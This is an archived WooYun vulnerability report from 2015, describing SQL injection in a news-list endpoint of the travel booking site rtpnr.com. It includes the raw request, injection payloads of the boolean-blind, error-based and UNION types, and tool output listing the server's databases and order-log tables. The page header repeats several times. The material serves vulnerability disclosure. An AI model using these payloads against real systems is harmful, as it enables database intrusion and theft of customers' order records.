中航易购某问题导致大量用户订单信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113312

漏洞标题：中航易购某问题导致大量用户订单信息泄露

漏洞作者：路人甲

提交时间：2015-05-11 11:32

修复时间：2015-06-25 14:10

公开时间：2015-06-25 14:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-11：细节已通知厂商并且等待厂商处理中
2015-05-11：厂商已经确认，细节仅向厂商公开
2015-05-21：细节向核心白帽子及相关领域专家公开
2015-05-31：细节向普通白帽子公开
2015-06-10：细节向实习白帽子公开
2015-06-25：细节向公众公开

简要描述：

233

详细说明：

POST /NewEdition/YeeGoNews/NewsList.aspx HTTP/1.1
Content-Length: 105
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.rtpnr.com
Cookie: ASP.NET_SessionId=1vofiirwz12vru45ppck0kbx; CheckCode=7036
Host: www.rtpnr.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
newscode=1&pageindex=1&pagesize=8&Type=GetTradeNews
测试payload:
newscode=YGO0001'%20AND%203*2*1%3d6%20AND%20'000ztv7'%3d'000ztv7
newscode=YGO0001'%20AND%203*2*2%3d6%20AND%20'000ztv7'%3d'000ztv7

漏洞证明：

---
Parameter: newscode (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newscode=YGO0001' AND 6260=6260 AND 'XCap'='XCap&pageindex=1&pagesize=8&Type=GetTradeNews
    Vector: AND [INFERENCE]
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: newscode=YGO0001' AND 9555=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9555=9555) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'PWvn'='PWvn&pageindex=1&pagesize=8&Type=GetTradeNews
    Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: newscode=YGO0001' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(85)+CHAR(111)+CHAR(116)+CHAR(66)+CHAR(120)+CHAR(84)+CHAR(72)+CHAR(122)+CHAR(90)+CHAR(106)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113)-- &pageindex=1&pagesize=8&Type=GetTradeNews
    Vector:  UNION ALL SELECT [QUERY]-- 
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
database management system users [2]:
[*] sa
[*] YeeGoWeb
available databases [23]:
[*] AutoTicket
[*] BACKUP
[*] distribution
[*] master
[*] model
[*] MonitorBlocking
[*] msdb
[*] Temp2015
[*] tempdb
[*] tslwp
[*] YeeGo_BackUp
[*] YeeGo_History
[*] YeeGo_Order
[*] YeeGoCopy
[*] YeeGoLog
[*] YeeGoTemp
[*] YeeGoUser
[*] YeeSkyBillings
[*] YeeSkyGo_TEST
[*] YeeSkyGoLog_History
[*] Yeesoho_test
[*] YSK_SAAS_History
[*] YSK_SAAS_TEST
Database: AutoTicket
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| dbo.T_ReceivingOrder_Log_20150509 | 4828407 |
| dbo.T_ReceivingOrder_Log_20150505 | 4761384 |
| dbo.T_ReceivingOrder_Log_20150506 | 4725686 |
| dbo.T_ReceivingOrder_Log_20150427 | 4679033 |
| dbo.T_ReceivingOrder_Log_20150503 | 4663783 |
| dbo.T_ReceivingOrder_Log_20150501 | 4661247 |
| dbo.T_ReceivingOrder_Log_20150417 | 4615511 |
| dbo.T_ReceivingOrder_Log_20150416 | 4578616 |
| dbo.T_ReceivingOrder_Log_20150423 | 4555551 |
| dbo.T_ReceivingOrder_Log_20150508 | 4537936 |
| dbo.T_ReceivingOrder_Log_20150504 | 4529144 |
| dbo.T_ReceivingOrder_Log_20150502 | 4513908 |
| dbo.T_ReceivingOrder_Log_20150428 | 4458769 |
| dbo.T_ReceivingOrder_Log_20150424 | 4426906 |
| dbo.T_ReceivingOrder_Log_20150430 | 4404906 |
| dbo.T_ReceivingOrder_Log_20150325 | 4386799 |
| dbo.T_ReceivingOrder_Log_20150429 | 4357274 |
| dbo.T_ReceivingOrder_Log_20150421 | 4356534 |
| dbo.T_ReceivingOrder_Log_20150418 | 4344581 |
| dbo.T_ReceivingOrder_Log_20150425 | 4338758 |
| dbo.T_ReceivingOrder_Log_20150419 | 4330283 |
| dbo.T_ReceivingOrder_Log_20150420 | 4322006 |
| dbo.T_ReceivingOrder_Log_20150320 | 4313560 |
| dbo.T_ReceivingOrder_Log_20150319 | 4276456 |
| dbo.T_ReceivingOrder_Log_20150311 | 4275833 |
| dbo.T_ReceivingOrder_Log_20150422 | 4270772 |
| dbo.T_ReceivingOrder_Log_20150426 | 4245304 |
| dbo.T_ReceivingOrder_Log_20141230 | 4209479 |
| dbo.T_ReceivingOrder_Log_20150321 | 4192467 |
| dbo.T_ReceivingOrder_Log_20150415 | 4150012 |
| dbo.T_ReceivingOrder_Log_20150507 | 4137469 |
| dbo.T_ReceivingOrder_Log_20150326 | 4117875 |
| dbo.T_ReceivingOrder_Log_20150324 | 4104741 |
| dbo.T_ReceivingOrder_Log_20150403 | 4084876 |
| dbo.T_ReceivingOrder_Log_20150318 | 4070910 |
| dbo.T_ReceivingOrder_Log_20150414 | 4046374 |
| dbo.T_ReceivingOrder_Log_20141231 | 4036910 |
| dbo.T_ReceivingOrder_Log_20150312 | 4000171 |
| dbo.T_ReceivingOrder_Log_20150402 | 3998813 |
| dbo.T_ReceivingOrder_Log_20150322 | 3946956 |
| dbo.T_ReceivingOrder_Log_20150323 | 3929905 |
| dbo.T_ReceivingOrder_Log_20150327 | 3913425 |
| dbo.T_ReceivingOrder_Log_20150331 | 3906339 |
| dbo.T_ReceivingOrder_Log_20150317 | 3898811 |
| dbo.T_ReceivingOrder_Log_20150409 | 3897456 |
| dbo.T_ReceivingOrder_Log_20150413 | 3888902 |
| dbo.T_ReceivingOrder_Log_20150328 | 3885350 |
| dbo.T_ReceivingOrder_Log_20150408 | 3877437 |
| dbo.T_ReceivingOrder_Log_20150411 | 3821738 |
| dbo.T_ReceivingOrder_Log_20150330 | 3817518 |
| dbo.T_ReceivingOrder_Log_20150313 | 3813373 |
| dbo.T_ReceivingOrder_Log_20150407 | 3801984 |
| dbo.T_ReceivingOrder_Log_20150412 | 3798156 |
| dbo.T_ReceivingOrder_Log_20150401 | 3784647 |
| dbo.T_ReceivingOrder_Log_20141229 | 3770215 |
| dbo.T_ReceivingOrder_Log_20150329 | 3758350 |
| dbo.T_ReceivingOrder_Log_20150314 | 3715299 |
| dbo.T_ReceivingOrder_Log_20150316 | 3709434 |
| dbo.T_ReceivingOrder_Log_20150406 | 3699308 |
| dbo.T_ReceivingOrder_Log_20150404 | 3670486 |
| dbo.T_ReceivingOrder_Log_20150315 | 3621205 |
| dbo.T_ReceivingOrder_Log_20150405 | 3573067 |
| dbo.T_ReceivingOrder_Log_20150410 | 3545505 |
| dbo.T_ReceivingOrder_Log_20150510 | 3265968 |
+-----------------------------------+---------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-05-11 14:09

厂商回复：

感谢反馈！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113312

漏洞标题：中航易购某问题导致大量用户订单信息泄露

相关厂商：rtpnr.com

漏洞作者：路人甲

提交时间：2015-05-11 11:32

修复时间：2015-06-25 14:10

公开时间：2015-06-25 14:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113312

漏洞标题：中航易购某问题导致大量用户订单信息泄露

相关厂商：rtpnr.com

漏洞作者： 路人甲

提交时间：2015-05-11 11:32

修复时间：2015-06-25 14:10

公开时间：2015-06-25 14:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113312"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云